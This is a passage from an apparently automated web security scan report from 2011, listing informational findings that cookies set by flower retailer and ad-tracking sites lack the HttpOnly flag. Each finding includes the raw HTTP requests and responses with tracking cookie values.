Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&jsref=http%3A%2F%2Fww30.1800baskets.com%2Ftemplate.do%3Fid%3Dtemplate3%26page%3D2000&rnd=1304903453531
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 09 May 2011 01:18:23 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 01:18:23 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


13.35. http://blooms.1800flowers.com/cm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blooms.1800flowers.com
Path:   /cm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: 90074784_login and 90074784_reset. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?ci=90074784&st=1304902848067&vn1=4.8.3H&ec=utf-8&vn2=e4.0&pi=w-Welcome%20Page&ul=http%3A%2F%2Fww30.1800flowers.com%2F&tid=6&cg=w&rnd=1304912507230&pc=Y&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java(TM)%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=16&tz=5&cvdone=p HTTP/1.1
Host: blooms.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; CoreID6=70101304902850161284526; TestSess3=70101304902850161284526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:56 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90074784_login=1304902856018461671490074784; path=/
Set-Cookie: 90074784_reset=1304902856;path=/
Expires: Sun, 08 May 2011 07:00:56 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

13.36. http://ftd.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ftd.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTSID and TLTUID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: ftd.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Set-Cookie: TLTSID=B1F84B9079D7107900059731C6D04BB5; Path=/
Set-Cookie: TLTUID=B1F84B9079D7107900059731C6D04BB5; Path=/; expires=Mon, 09-05-2021 01:00:13 GMT
Location: http://www.ftd.com/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 346
Date: Mon, 09 May 2011 01:00:13 GMT
X-Varnish: 1301368678
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>301 Moved Permanently</TITLE>
</HEAD><BODY>
<H1>Moved Permanently</H1>
The document has moved <A HREF="http://www.ftd.com/">here<
...[SNIP]...

13.37. http://idcs.interclick.com/Segment.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: sgm. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=b053470b-90a6-47ab-9052-d6a092e04e08 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&abandon_products=91637
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260&9174=734264; domain=.interclick.com; expires=Sun, 09-May-2021 01:04:51 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 01:04:51 GMT

GIF89a.............!.......,...........D..;

13.38. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: C2, GUID and DBC. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=birthdaysmiles_cs=1&betq=12580=431215 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; GUID=MTMwNDc2NzUwMjsxOjE2cjRvcHExdHZsa21sOjM2NQ; C2=jsYxN5pqDIxFG+sovQg3sYIdSK8BItdxPfQ3WX8zHsY4F/8Bw3gxPfQ7NY8zHoLOG/8BKGexPfwmhX8zH8eDG/8BdDmxPfwohX8zHQY4F/8BYimxPfA3Wa8zHoa4F/8BA9qxPfgdeZ8zH4fFG/8BbTexPfwKOa8zHoN5F/8BC9qxPfwtZa8zHE0rG/8BFBqxPfQTaa8zHY4dG/8BNLqxPXrqEoxsGSXtrSQIzaEoRGABg2cBJbm5IaAqxOCBsRpxg2I9IsfzFA3i4SQBwWY0ltCqGkNseSw7Ra83VSPBrLqhRPJUEQT2F/NruTQAzZ830KHBbzqxfn6BE8sXG/NogVwrgYQZzWdBkoqhzO67FcNNGuekAbwuRXA1um/BEOphBMLUHsEpGyAq+fQoeZsEfO8BgwhR6U7/HUJtGgZZpTrBQHqFH09IG4co8ew5qY8zY6wBsMiRteAnjaUrHEv9F1aqGhQ9fZ8WFirZDugBoC; F1=B8ziF3kAAAAAgCsCAEAAgEABAAAABAAAAMAAgEA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAnq2C+ORAgHEGte/mz/DHyJN5VpuB!

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 01:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=NzzxN5pqDIxFGMnovQg3sYAGSK8BItdRzdQ3WX0cHsY4FN3Bw3gRzdQ7NY0cHoLOGN3BKGeRzdwmhX0cH8eDGN3BdDmRzdwohX0cHQY4FN3BYimRzdA3Wa0cHoa4FN3BA9qRzdgdeZ0cH4fFGN3BbTeRzdwKOa0cHoN5FN3BC9qRzdwtZa0cHE0rGN3BFBqRzdQTaa0cHY4dGN3BNLqRzVrqEoxsGgRtrSQIza8QRGABg2chsZm5Ia4SxOCBsRpRE1I9IsfzFOxi4SQBwWQdltCqGyHseSw7Ra0gVSPBrLqB1NJUEQT2FNIruTQAzZ0g0KHBbzqRDm6BE8sXGNIogVwrgYICzWdBkoqBXN67FcNNG8YkAbwuRX4dumvBEOpBlOLUGsEpGALq+bQoeZktfOsBgwhxdX7/HUJtGuTZpTrhzFqFH09IGGXo8ew5qY0cY6wBsMixQdAnjaMUHEv9FDVqGdQ9fZ0/FirZDughLFLJI8GlGAH; domain=advertising.com; expires=Wed, 08-May-2013 01:01:01 GMT; path=/
Set-Cookie: GUID=MTMwNDkwMjg2MTsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Wed, 08-May-2013 01:01:01 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 09 May 2011 02:01:01 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

13.39. http://login.dotomi.com/ucm/UCMController

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /ucm/UCMController

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Apache. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ucm/UCMController?dtm_com=28&dtm_cid=2024&dtm_cmagic=07811d&dtm_fid=101&dtm_format=5&cli_promo_id=4&dtmc_scat_id=PBS&dtmc_prod_id=30003767&dtmc_ref=http%3A//www.proflowers.com/house-plants-PBS%3Ftile%3Dhmpg_podA%26Ref%3DHomeNoRef HTTP/1.1
Host: login.dotomi.com
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 12:12:37 GMT
X-Name: dmc-o01
Set-Cookie: Apache=173.193.214.243.1304943157404326; path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Content-Type: text/html
Content-Length: 191

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</head>

<body>

</body>
</html>

13.40. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.ftd.com
Path:   /b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/ftdprod/1/H.4-pdv-2/s48131725573912?[AQB]&ndh=1&t=8/4/2011%2020%3A0%3A34%200%20300&ns=ftdcom&pageName=Home%20Page&g=http%3A//www.ftd.com/&r=http%3A//www.ftd.com/&cc=USD&events=event13&c1=351&v1=351&c2=Main%20Site&v2=Main%20Site&c3=Main%20Site&v3=Main%20Site&c4=Main&v4=Main&c5=351%3AHome%20Page&c6=Main%20Site%3AHome%20Page&c7=Main%20Site%3AHome%20Page&c8=Main%3AHome%20Page&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: metrics.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 01:00:37 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E39E5A851D2CAB-6000010360000EE4[CE]; Expires=Sat, 7 May 2016 01:00:37 GMT; Domain=.ftd.com; Path=/
Location: http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912?AQB=1&pccr=true&vidn=26E39E5A851D2CAB-6000010360000EE4&&ndh=1&t=8/4/2011%2020%3A0%3A34%200%20300&ns=ftdcom&pageName=Home%20Page&g=http%3A//www.ftd.com/&r=http%3A//www.ftd.com/&cc=USD&events=event13&c1=351&v1=351&c2=Main%20Site&v2=Main%20Site&c3=Main%20Site&v3=Main%20Site&c4=Main&v4=Main&c5=351%3AHome%20Page&c6=Main%20Site%3AHome%20Page&c7=Main%20Site%3AHome%20Page&c8=Main%3AHome%20Page&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 01:00:37 GMT
Last-Modified: Tue, 10 May 2011 01:00:37 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www27
Content-Length: 0
Content-Type: text/plain


13.41. http://pix04.revsci.net/K10145/a3/0/3/pg.302

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fproduct&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305608&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; 
rtc_0s-X=MLvntzM1ZwprJ5GrFviWjmmgATvMNHGJjojTTrWSZIpIFNkgDw/K4gucx48Ansn8gFdhbSFjRTa6QTj/I+16qFvFR8txZ3XhW+h/MeB/oGJTuWd71KWU93xLd4iO2rbczqqb71ITWUbp6EX0wNdtopvMxVqaM1JqYfNKs97ZtBaRULM0PwDcs+nUakr6T4pQ6ZAhwqqC8M5QeQgL3Mwz/l/LO7TuRHS3DG/WEBaa4GMZypMTtieoEqNYKS5uaQdc9YsZ/I7stOdJLd7Hv2XYRUoNtaop227HsWyGbHxMn003mjucGc0mruqE+6DHP6brM6nM6x/tn7oZ2DjdBMJUOZiv9xqjlXnqcVjrB3kXcNTeDq09E5IMKoYrVJlZkK6uobYwka3tRmxkmifKh23k49KG9Bf6S2yRaNGnAYLK+zm7JATIxubd282sNX+n1154JTW43J8wLUy5/9w1/V1bn+LfnLjopCoy5O0KIgr5+yVcorYv+yTBZ8FhgCJA+Q8QvQjH/z6qkFkkgV2Pc0Qu8ePOuvk8qolmk5a5cRl/uMAl5d1L5fAWohFKLmeKHnIc1teXHxZ62z3xlAPoH3vSe3gvL1dmnj44UotfcgD9gjypLg/DU9uqsl/Rdd2M4KoI4aNAtW2PewAt7/uqPhIVZ2lA67g753Fs+YYdF+aGv8uJwGCyFeT/2FR7o49m55h8Gwxj243dmAFbzNMgnnyKGgxLPowo3XlGRBBhnfGcjmQaduyakw2Situk66TlalCm1TQvRzzJbNCx+dssYOfOQB0bbtJ2ntUVoY0/MWG+7X9mFMcU0K1YsXlTv3JLgSG9szKwKoXeXI5nGPmexJQamIZZRu75FQen7qI5XVSM/FyhyjLG6RJHjFKcgLVTWbop0qonwtOz+dRaa+XzimvUgmjE/LsOByg4WyNecM6WuqsLzQSwbwkJu6ayeu/z8NTC7c0uuc9GN4iMyZ0VRwyeREtwXmyzI9BFcLyZ3Rs4ivUj2RjCjvtSsNNRHe2053cF2Vi66vu8vK0TwhhQ+4nNefilYUbTA6wV1dbQtthV8yc5tkCS4xO8RM2JqwjJ+2RL0MnC0HJ4Sa9kFkqhq5GF29eaWIKbJnhrkHmZYVI20kuZatlwGXCzd05n7WE/cFig6PF+oHMyVEvg3H2Geqve6dtrbR5/nlqFYJUJmU1LO9t6E30Vexgt/OqPCKtq5Buy0heNFn43D/XEPUM075oPE41B7rGtcoZLDHSX5xusWqM7Xz3Yy0rj1w/OGBhEfzOXP0tA8vgBAjPNzEOqo9q4g3TV0zqIlK03g3UEsVsKd8lrYh6vves5TCqBe0HeDGyLF1ZryuAIiKWwjLAn92Tu49HaCCp5ZapUWKSIpxW6EBmQA4m6a+VSTrtsZqZKuqbIAMmb6Z5nlEJ0CvScdpzM8bELtNupCMCENC4+mcWsy8PXof63WNfpjPhyWcxL6XPwO+XIvL1yoRu187rFg4rnh0OUfdRdE7b+DsMlXGSWyiWEOb7KYoa7LZDfbPfYMXY=; rsiPus_8M_3="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"; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_0s-X=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:09:43 GMT; Path=/
Set-Cookie: rtc__Lvf=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:09:43 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:09:42 GMT


13.42. http://pix04.revsci.net/K10145/a3/0/3/pg.302

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fshoppingbasket&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305609&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP15EOheQIMpzaxu2F29/z4Oss1gLZjurYNWhPokQNisncWnkGNdTd0q7tfEV6W8KYgNWe1zVP+wCE1bPgjy4/MlMu8fmb//NXar7Y6nPMFsDruxPoho+utFRzl9KlIWGX2y70JUsCX3oMTJVeFpvQWeVG9EvO7g73n2XzRwEEq30oSRzL21IY3cRpB7Vmzy1iqPeGQBJS5IhTr1vDFC8xHxrtUssduWU5dSZDN02PVSvaPDKNavJVcnziCHODolt2y79Os6T2ZV7+uWOw6Bb9lnQdZ7gG88UntJ8C1+1XhcYHsfqd+lQ7Pi+ZYIf3rQwj4PSgc/RykJQiQCXjj7Rs1RundYD6Xg9I/w0FdmmlwAsf1Ud7bhVj1rccGdiwOKwKHslwVcWlooMuuAHdQ/ysL2mjNHQ3Cr73mIpKz56ZnRkKCUpv6L2FoypfDkuoIGiYRen9fnjxJ4gwcFowoMvUN+bMu+LYYU73iVUgpezphlKRKe54pCx/I1J3qADaapZY8OFHAOQ0jQik2eXFisC4=; rtc_VOiH=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; 
rsiPus_0QhP="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8agCQaitfp6FA0C8r6hsCwn3LMq6VYMHBegA/Z8Ad/QVjxQ2jNsY0ZWD+qEDxiaWPrTwV87vSfczY/tW5l+pH2v6yDAOuX7qLwExVNaXzP2AMt2j6L/eVkJaL8Z3clgZfjZQfsz2Izvu3lvroVB5Qkq5knhep0fRnij2U5Rhz/Vq0pNRMfJgqDntQNUxuwMuKPi/MV/+D5eTiviMqUVLFajotuW5yMfx/XCoKPsB5uFmJ0aEeYdxcSsloefxMiWADTneb8JcFvWYtzJV7goOlW2IZx/Qe7uHD+WE8DohrAg/IzlnQvpZUk/4nt3G7S1d2+FlWbhTTptTyrmqrUJmLu9d0aNbocdAj+G6puSgbaITB3GNtmbmWvWWYkjJUdAu8bWyz1Vxk9EtoZWN3fQ4moqyebnLZSCFznuaZy3XM1MZ/6UPGDGHg0wxwW93Ub4rBq2yDHcsfYbVyvGXzLw+8b+9UUy9zqBvbciwPhJtnEN2oJ+DSWNdng4kQV2z3lppmGNciKPNvEKlkFUGDPVMAtT9lm7UtaNWxCHXgjOtDbRm+CiahJd7NZgrCqRLfB5y//J0Ufw2gwej267ae86TAzxXu2eN6qgF8dcgK67pb0uoIvBvpTfgwi1pcxvPMCci4Vi8mTRD9tCnSNVAoEbX9LWcwaPN2Q7u7zZIF0oXM2p6RhJVeuJefa0PpIftjz0TCJPHRy7zk/lxwmTTLV3ffe8wrI7wgAyuSZxJ9HAJHIAxBzEkzwZWCcYNelk2KyyMGwsgsHyGpeFNI6jLb9IUyzjd7Cykl5KXX0/7MCFYJZEI97vkjpX7jX+GTSxF6d9Kgn6FEOTsU/uJhGmj59St/BrJxgeq94hjxHaiSpe